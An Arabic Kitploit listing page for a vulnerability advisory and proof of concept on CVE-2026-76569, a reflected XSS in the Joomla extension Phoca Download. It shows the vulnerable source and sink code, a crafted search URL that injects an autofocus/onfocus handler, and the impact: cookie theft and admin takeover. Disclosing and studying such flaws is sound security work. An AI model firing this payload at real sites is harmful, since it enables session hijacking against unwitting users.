Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-76569 — انعكاس XSS عبر معامل البحث GET في Phoca Download | Kitploit
أدوات/GitHubGitHub/toanln-cov/cve-2026-76569
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

انعكاس XSS عبر معامل البحث GET في Phoca Download

عرض المستودع
4منذ 21 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة XSS المنعكسة عبر معامل البحث GET في Phoca Download

Phoca Download ≤ 6.1.4 — مهاجم مُصادَق ينفّذ JavaScript عشوائيًا عبر رابط بحث مُصمَّم في لوحة تحكم المستخدم

CVE CVSS v4.0 CWE-79 Affected Researcher


الملخص

يحتوي Phoca Download (com_phocadownload) الخاص بـ Joomla على ثغرة Cross-Site Scripting (XSS) منعكسة في وظيفة البحث عن الملفات في لوحة تحكم المستخدم. تتم معالجة معامل search GET باستخدام مُرشِّح 'string' الخاص بـ Joomla — والذي يستدعي strip_tags() فقط ويحافظ على حرف — ثم يتم إخراجه دون استخدام داخل سمة HTML . يمكن للمهاجم حقن سمات HTML عشوائية ومعالجات أحداث يتم تنفيذها في متصفح الضحية عند تحميل الصفحة، دون الحاجة إلى أي تفاعل من المستخدم بخلاف النقر على رابط مُصمَّم.

"
htmlspecialchars()
<input value="">

الإصدارات المتأثرة

المكوّنقابل للتأثرتم الاختبار عليهتم الإصلاح
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

تفاصيل الثغرة

النوع: Cross-Site Scripting منعكسة (CWE-79) المصادقة المطلوبة: مستخدم Joomla مسجَّل (مسجّل الدخول) + لوحة تحكم المستخدم مفعّلة (enable_user_cp = 1) رمز CSRF المطلوب: غير مطلوب — طلب GET، لا يتم التحقق من رمز CSRF في هذا المسار ملف الحوض (Sink): site/views/user/tmpl/default_files_bootstrap.php

السبب الجذري

يتم قراءة معامل search باستخدام مُرشِّح 'string' الخاص بـ Joomla، والذي يستدعي strip_tags() فقط. يحافظ هذا على حرف "، مما يسمح للمهاجم بالخروج من سياق السمة value="" وحقن سمات HTML عشوائية.

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — المصدر (SOURCE)

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // stored without encoding

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — الحوض (SINK) (قابل للتأثر)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

العرض الشقيق phocadownloadlinkfile (نفس الإضافة) يطبّق بشكل صحيح PhocaDownloadUtils::filterValue($search, 'text') — المكافئ لـ htmlspecialchars() — لنفس حقل البحث. عرض user لا يطبّق نفس الحماية، مما يشير إلى ترميز إخراج غير متسق داخل الإضافة.


إثبات المفهوم

1. تسجيل الدخول كمستخدم مسجَّل

انتقل إلى صفحة تسجيل الدخول في Joomla وقم بالمصادقة كمستخدم مسجَّل. بعد تسجيل الدخول بنجاح، يعيد Joomla التوجيه إلى صفحة ملف المستخدم، مما يؤكد وجود جلسة نشطة.

تسجيل دخول ناجح باسم testuser — تمت إعادة التوجيه إلى صفحة الملف الشخصي

2. الوصول إلى لوحة تحكم المستخدم (الحالة الأساسية)

انتقل إلى لوحة تحكم المستخدم في PhocaDownload:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

يتم عرض الصفحة مع حقل بحث فارغ (value=""). هذه هي الحالة الطبيعية قبل الحقن.

لوحة تحكم المستخدم — حقل بحث فارغ، الحالة الأساسية

3. إرسال رابط مُصمَّم مع حمولة XSS

انتقل إلى الرابط المُصمَّم التالي (أو اكتب الحمولة الخام مباشرة في مربع البحث):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

رابط مُصمَّم مع حمولة XSS مُرسَلة إلى معامل البحث

عند تحميل الصفحة، تقوم سمة autofocus المُحقونة بتركيز عنصر الإدخال، مما يؤدي فورًا إلى تشغيل معالج الأحداث onfocus. لا يلزم أي تفاعل إضافي من المستخدم.

HTML المُخرَج (قابل للتأثر):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

التأثير

  1. اختطاف الجلسة — يمكن للمهاجم سرقة ملف تعريف ارتباط الجلسة الخاص بالضحية في Joomla عبر document.cookie، مما يتيح الاستيلاء الكامل على الحساب دون بيانات اعتماد.
  2. تنفيذ JavaScript عشوائي — يتم تنفيذ أي JavaScript في جلسة متصفح الضحية — تسجيل ضغطات المفاتيح، التلاعب بـ DOM، جمع بيانات الاعتماد، وإعادة التوجيه إلى صفحات التصيد الاحتيالي كلها ممكنة.
  3. تصعيد الامتيازات — إذا نقر مسؤول على الرابط المُصمَّم أثناء تسجيل دخوله، يحصل المهاجم على تنفيذ JavaScript بمستوى المسؤول، مما قد يتيح اختراق الموقع بالكامل عبر إجراءات لوحة الإدارة.

المراجع

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • GitHub Advisory: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • مستودع المطوِّر: https://github.com/PhocaDesign/PhocaDownload
تنزيل الأداة